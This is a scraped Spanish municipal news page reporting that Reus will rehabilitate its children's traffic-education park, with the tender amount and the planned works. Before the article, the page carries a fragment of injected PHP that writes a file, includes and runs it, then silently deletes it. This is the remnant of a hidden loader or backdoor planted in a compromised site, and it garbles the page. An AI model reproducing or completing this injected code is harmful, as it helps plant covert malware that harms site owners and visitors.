");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> El Ayuntamiento de Reus rehabilitará el Parque Infantil de Tráfico, donde cada curso 2.200 alumnos se forman en educación vial
Iconos cabecera

Destacamos

  • SEM 2021SEM 2021
    Semana Europea de la Movilida 2021

El Ayuntamiento de Reus rehabilitará el Parque Infantil de Tráfico, donde cada curso 2.200 alumnos se forman en educación vial (24/01/2020)

El Ayuntamiento de Reus, a través de la colaboración de la Guardia Urbana y la concejalía de Urbanismo y Movilidad ha redactado el proyecto de rehabilitación del Parque Infantil de Tráfico para mejorar las condiciones de un espacio por donde cada curso unos 2.200 alumnos se forman en educación vial. El contrato de obras de la reforma del parque de la calle de Josep Maria Folch sale a licitación pública este jueves, 23 de enero, por un importe de 68.254,65 euros.

El parque de tráfico es un equipamiento central del programa de educación vial que la Guardia Urbana lleva a cabo en los institutos y escuelas de la ciudad, con clases teóricas y prácticas con alumnos de 5º de primaria y 1 de ESO.

Las obras de mejora consistirán en tres actuaciones: la reforma de la pavimentación del circuito donde se realizan las prácticas en bicicletas o pequeños karts; la rehabilitación del edificio destinado a aulario; y la ampliación de la zona de lavabos para adaptar uno para personas con movilidad reducida. Los trabajos tienen un plazo de ejecución de tres meses a partir de la firma del contrato.

La zona pavimentada se encuentra deteriorada por el paso de los años, y levantada por las raíces de los árboles. Derribó toda la parte destinada a viales y se pavimentará de nuevo, adaptándolos a los condicionantes de la vegetación.

La construcción donde está el aulario requiere de un mantenimiento para poder seguir con las clases que se imparten, así como una mejora en la accesibilidad del espacio. La obra se centrará en la impermeabilización de la cubierta.

Finalmente, se prevé la ampliación de la zona de aseos, para poder adaptar uno para personas con movilidad reducida.

Fuente: Ayuntamiento de Reus

El Ayuntamiento de Reus rehabilitará el Parque Infantil de Tráfico, donde cada curso 2.200 alumnos se forman en educación vial

[Volver a Noticias]

 
Calle de Anselm Clavé, 1 43004 - Tarragona